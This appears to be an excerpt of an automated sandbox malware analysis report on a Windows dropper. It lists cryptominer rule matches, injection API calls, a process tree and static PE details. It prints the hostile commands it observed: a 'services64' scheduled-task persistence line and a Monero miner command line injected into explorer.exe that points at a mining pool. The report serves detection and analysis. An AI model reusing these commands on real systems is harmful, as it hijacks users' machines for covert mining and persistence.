                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401D58 NtAllocateVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401D18 NtWriteVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_004019D8 NtCreateThreadEx,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401D98 NtProtectVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401C98 NtClose,
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA3625A30E NtUnmapViewOfSection,
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA3626A3EE NtUnmapViewOfSection,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401D58 NtAllocateVirtualMemory,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401D18 NtWriteVirtualMemory,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_004019D8 NtCreateThreadEx,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401D98 NtProtectVirtualMemory,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401C98 NtClose,
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655959061.000000000370C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmpBinary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: sistem.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.00044194799
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.00537109375
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.00051229508
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.0107421875
                  Source: sistem.exe.1.drStatic PE information: Section: ZLIB complexity 1.00051229508
                  Source: sistem.exe.1.drStatic PE information: Section: ZLIB complexity 1.00054824561
                  Source: sistem.exe.1.drStatic PE information: Section: ZLIB complexity 1.0107421875
                  Source: sistem.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 0.995659722222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeVirustotal: Detection: 34%
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name=&apos;explorer.exe&apos;
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name=&apos;explorer.exe&apos;
                  Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6040)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\sistem.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_01
                  Source: explorer.exeString found in binary or memory: id-cmc-addExtensions
                  Source: explorer.exeString found in binary or memory: set-addPolicy
                  Source: explorer.exeString found in binary or memory: id-cmc-addExtensions
                  Source: explorer.exeString found in binary or memory: set-addPolicy
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic file information: File size 3609088 > 1048576
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x2f2e00
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C3665 push ss; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C36AF push ss; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BC283 push ebp; iretd
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BECAF pushfd ; ret
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BC49B push esp; retf 0000h
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C1498 push ebp; ret
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BD161 push edi; iretd
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BD1D3 push cs; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BF1B4 push ecx; iretd
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C4980 push ecx; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C2591 push edx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05644650 push esp; iretd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_0564460E push es; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05643C58 push esp; iretd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05643C92 push esp; iretd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05645F40 push es; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F7D30 push eax; retn 0009h
